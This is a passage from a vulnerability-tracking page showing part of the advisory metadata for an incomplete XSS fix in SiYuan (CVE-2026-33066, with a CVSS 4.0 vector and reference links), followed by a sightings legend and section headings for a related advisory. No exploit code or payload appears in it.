      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33066"
    },
    {
      "type": "WEB",
      "url": "https://github.com/siyuan-note/siyuan/commit/b382f50e1880ed996364509de5a10a72d7409428"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/siyuan-note/siyuan"
    },
    {
      "type": "WEB",
      "url": "https://github.com/siyuan-note/siyuan/releases/tag/v3.6.4"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "SiYuan has incomplete fix for CVE-2026-33066: XSS"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-40922 (GCVE-0-2026-40922)

FKIE_CVE-2026-40922

GHSA-8Q5W-MMXF-48JG

Summary

Affected Package

Details

PoC

Impact

Suggested Remediation

References

Tags

Sightings

Nomenclature